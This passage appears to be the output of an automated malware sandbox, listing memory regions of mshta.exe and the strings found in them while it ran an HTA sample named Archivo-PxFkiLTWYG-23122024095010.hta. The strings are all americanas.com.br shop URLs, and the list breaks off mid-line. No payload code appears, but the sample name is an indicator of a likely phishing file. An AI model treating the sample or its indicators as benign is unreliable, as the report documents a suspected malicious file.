00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535609575.000000000533A000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/especial/natal?chave=dk_hm_ats_2_0_natal24
Source: mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/especial/natal?chave=dk_hm_ats_2_0_natal24meta.smallmeta.small.heightm
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.00000000051D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540463831.0000000007969000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/especial/natal?chave=dk_hm_dt_2_9_natal24
Source: mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/especial/natal?chave=dk_hm_dt_2_9_natal24meta.largemeta.large.heightme
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540237396.0000000000759000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.00000000051D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484369993.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538243144.0000000000743000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/especial/natal?chave=dk_hm_tp_1_0_natal24
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548679681.0000000005D1D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005185000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.541042280.0000000005D1D000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/especial/natal?chave=pfm_hm_tt_1_0_natal24
Source: mshta.exe, 00000000.00000003.548553793.00000000079C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539645441.0000000007984000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540451503.00000000079C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538072268.0000000007982000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539776600.00000000079B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/especial/natalca
Source: mshta.exe, 00000000.00000003.548553793.00000000079C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539645441.0000000007984000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540451503.00000000079C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538072268.0000000007982000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539776600.00000000079B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/especial/oferta
Source: mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/especial/oferta-do-dia?chave=dk_hm_ats_2_9_oddmeta.smallmeta.small.hei
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539149198.000000000514B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539161574.0000000005152000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005185000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/especial/oferta-do-dia?chave=prf_hm_0_tt_7_
Source: mshta.exe, 00000000.00000003.542171761.0000000007C86000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.536957836.0000000007C86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/acessibilidadeel.
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538862819.000000000515E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/americanas-mais-clima?chave=pfm_home_sustentabilidade_menu
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537741934.0000000007B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.0000000007B6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005DCD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005DAE000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/americanas-mundo?chave=brd_hm_bt_0_footer_amundo
Source: mshta.exe, 00000000.00000003.535486328.0000000005344000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535351898.0000000005337000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535471671.000000000533C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/americanas-mundo?chave=brd_hm_bt_0_footer_amundohttps://www.am
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005E24000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/americanas-mundo?chave=dk_hm_branding_amundo
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005E1A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538862819.000000000515E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/americanas-mundo?chave=pfm_home_amundo_menu
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539149198.000000000514B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539161574.0000000005152000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.00000000051D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/americanas-mundo?chave=prf_hs_0_dt_1_00_amundo
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535457179.0000000005336000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/americanas-social?chave=dk_hm_branding_social
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535449726.0000000005307000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.00000000051D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535589591.0000000005309000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535199624.0000000005307000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005DAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540049421.00000000051D1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.00000000051B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539944087.00000000051B8000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/app?chave=dk_hm_ats_2_1_baixeoapp
Source: mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/app?chave=dk_hm_ats_2_1_baixeoappmeta.smallmeta.small.heightme
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.00000000051D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540463831.0000000007969000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/app?chave=dk_hm_dt_2_11_baixeoapp
Source: mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/app?chave=dk_hm_dt_2_11_baixeoappmeta.largemeta.large.heightme
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540586764.0000000007943000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548308733.0000000007943000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005DAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538243144.0000000000743000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/app?chave=dk_hm_hd_1_0_baixeoapp_faixa
Source: mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/app?chave=dk_hm_hd_1_0_baixeoapp_faixameta.largemeta.large.hei
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540463831.0000000007969000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005DAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/app?chave=dk_hm_hd_1_0_ge
Source: mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/app?chave=dk_hm_hd_1_0_gemeta.largemeta.large.heightmeta.large
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539149198.000000000514B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548511611.000000000514C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538862819.000000000515E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539805523.000000000515F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539906624.000000000514C000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/app?chave=prf_hs_0_dt_1_00_baixeoapp
Source: mshta.exe, 00000000.00000003.537786668.0000000004494000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548436103.0000000004494000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540937966.0000000004494000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539662366.0000000004494000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/assessoria
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537741934.0000000007B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.0000000007B6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484369993.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/assessoria-imprensa?chave=dk_hm_ft_00_03_imprensa
Source: mshta.exe, 00000000.00000003.535486328.0000000005344000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540298823.0000000005278000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537741934.0000000007B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.0000000007B6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005278000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.542885580.0000000005279000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548594202.000000000527B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540707630.0000000004422000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484369993.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537996386.0000000004420000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535351898.0000000005337000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535471671.000000000533C000.00000004.00000800.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/atendimento?chave=dk_hm_ft_00_01_atendimento
Source: mshta.exe, 00000000.00000003.540438972.0000000007AD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537741934.0000000007B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.0000000007B6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537867574.0000000007AAC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.000000000443E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540834795.0000000007AD1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005DCD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484369993.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007A50000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005DAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538411913.0000000007AB7000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/atendimento_entrega?chave=dk_hm_ft_00_04_entrega
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540298823.0000000005278000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537741934.0000000007B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.0000000007B6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005278000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.542885580.0000000005279000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548594202.000000000527B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 